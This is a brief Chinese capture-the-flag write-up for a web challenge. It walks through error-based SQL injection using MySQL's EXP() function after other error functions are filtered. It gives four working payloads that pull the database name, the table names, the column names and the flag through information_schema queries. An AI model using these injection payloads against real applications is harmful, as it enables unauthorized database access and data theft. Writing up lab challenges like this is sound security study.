题目地址:http://ctf5.shiyanbar.com/web/index_3.php
题目提示了这道题是sql报错注入,那就先试试吧
上网找到报错注入的函数,尝试发现floor,extractvalue,updatexml被吃掉了,那就用exp
爆库名:'or EXP(~(SELECT * from(select database())a))#
爆表名:'or EXP(~(SELECT * from(select group_concat(table_name) from information_schema.tables where table_schema=database())a))#
看来flag应该在flag表里了
爆列名:'or EXP(~(SELECT * from(select group_concat(column_name) from information_schema.columns where table_name='flag')a))#
getflag:'or EXP(~(SELECT * from(select group_concat(flag) from flag)a))#
the end
网友评论